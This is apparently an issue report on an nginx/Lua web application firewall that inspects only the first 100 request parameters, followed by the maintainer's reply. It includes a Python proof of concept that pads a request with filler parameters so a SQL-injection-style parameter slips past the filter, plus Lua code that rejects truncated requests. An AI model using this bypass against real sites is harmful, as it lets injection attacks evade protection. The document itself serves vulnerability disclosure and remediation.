`get_post_args` and `get_uri_args` only read the first 100 parameters by default. If an attacker submits 100 junk parameters followed by the injected parameter, the WAF is bypassed. Proof-of-concept Python script:

```python
import requests

# 100 filler parameters, then the injected one as the 101st
args = 'a=1' + '&a=1' * 99
sqli = 'b=select*from'

r1 = requests.get('http://127.0.0.1/?' + sqli)
print(r1.url)
print(r1.status_code)  # returns 403

r2 = requests.get('http://127.0.0.1/?' + args + '&' + sqli)
print(r2.url)
print(r2.status_code)  # returns 200
```
The official recommendation is to reject requests with too many parameters using the following code:

```lua
local args, err = ngx.req.get_post_args()
if err == "truncated" then
    -- one can choose to ignore or reject the current request here
end
```
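An added example, not the project's code and not from the issue author, of applying that advice in the WAF's access phase for both URI and POST arguments. It assumes the ngx_lua API quoted above, where `get_uri_args`/`get_post_args` return the string `"truncated"` as a second value once the default cap of 100 is exceeded:

```lua
-- Added example: fetch request arguments for the WAF and refuse the
-- request when ngx_lua reports that the argument cap was exceeded,
-- instead of silently inspecting only the first 100 parameters.
-- Assumes the ngx_lua API described in this issue ("truncated" is
-- returned as a second value once the cap is hit).

local MAX_ARGS = 100  -- ngx_lua's default cap; kept deliberately

-- Returns the URI argument table, or nil plus a reason on overflow.
local function uri_args_or_reject()
    local args, err = ngx.req.get_uri_args(MAX_ARGS)
    if err == "truncated" then
        return nil, "too many URI args"
    end
    return args
end

-- Same for the body; read_body() must run before get_post_args.
-- Any other error (e.g. body spilled to a temp file) is also treated
-- as "cannot inspect", so the WAF never sees a partial picture.
local function post_args_or_reject()
    ngx.req.read_body()
    local args, err = ngx.req.get_post_args(MAX_ARGS)
    if err == "truncated" then
        return nil, "too many POST args"
    elseif not args then
        return nil, err or "unreadable request body"
    end
    return args
end

-- Access-phase entry point: reject on overflow, then hand the complete
-- (untruncated) tables to the WAF's existing matching logic.
local function collect_args()
    local uri_args, err = uri_args_or_reject()
    if not uri_args then
        ngx.log(ngx.WARN, err, " from ", ngx.var.remote_addr)
        return ngx.exit(ngx.HTTP_FORBIDDEN)
    end

    local post_args = {}
    if ngx.req.get_method() == "POST" then
        post_args, err = post_args_or_reject()
        if not post_args then
            ngx.log(ngx.WARN, err, " from ", ngx.var.remote_addr)
            return ngx.exit(ngx.HTTP_FORBIDDEN)
        end
    end
    return uri_args, post_args
end

return collect_args
```

Wired into `access_by_lua_*`, a request that overflows the cap (such as the filler-parameter request in the PoC) is answered with 403 before any rule matching runs, so nothing past the 100th parameter can slip by uninspected.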
Thanks, this is indeed a vulnerability. You're welcome to submit a PR to fix it, or I'll fix it myself when I'm less busy.

Is this issue already fixed? Kind regards!